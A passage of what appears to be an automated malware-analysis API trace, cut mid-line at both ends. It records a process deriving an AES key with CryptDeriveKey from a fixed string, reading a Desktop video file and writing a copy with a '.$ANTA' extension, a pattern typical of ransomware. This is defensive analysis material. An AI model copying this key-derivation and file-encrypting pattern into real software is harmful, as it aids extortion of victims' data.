lpUsedDefaultChar=0x0) returned 35 [0125.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0125.661] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0125.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0125.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0125.661] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.661] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0125.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca8c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0125.661] CryptHashData (hHash=0x41ac540, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0125.661] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.661] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.661] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0125.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa48, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0125.661] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0125.662] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0125.662] CryptDestroyHash (hHash=0x41ac540) returned 1 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0125.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9578 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0125.663] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0125.663] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0125.663] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0125.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0125.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0125.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0125.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0125.664] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tj494Ho-BBcDUp1CA.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\tj494ho-bbcdup1ca.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0125.664] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.679] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0125.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0125.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0125.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0125.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0125.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0125.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0125.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.679] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0125.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0125.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0125.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0125.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0125.680] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0125.680] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0125.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0125.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0125.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0125.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0125.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e4f0 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0125.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0125.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e4f0 | out: hHeap=0x1780000) returned 1 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0125.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0125.682] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0125.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0125.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0125.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0125.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0125.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0125.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.683] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tj494Ho-BBcDUp1CA.mkv.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\tj494ho-bbcdup1ca.mkv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0125.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0125.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0125.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0125.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0125.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0125.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.684] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0125.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0125.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0125.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0125.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0125.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0125.684] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0125.684] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0125.685] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0125.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0125.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0125.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0125.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0125.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0125.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b87020 [0125.706] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0125.707] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0125.710] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x6d36, lpOverlapped=0x0) returned 1 [0125.711] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0125.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0125.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16d36) returned 0x49aa010 [0125.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b87020 | out: hHeap=0x1780000) returned 1 [0125.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0125.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0125.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0125.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0125.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16d36) returned 0x49c0d50 [0125.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0125.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.719] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0125.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0125.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0125.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16d36) returned 0x49aa010 [0125.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0125.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0125.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.719] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 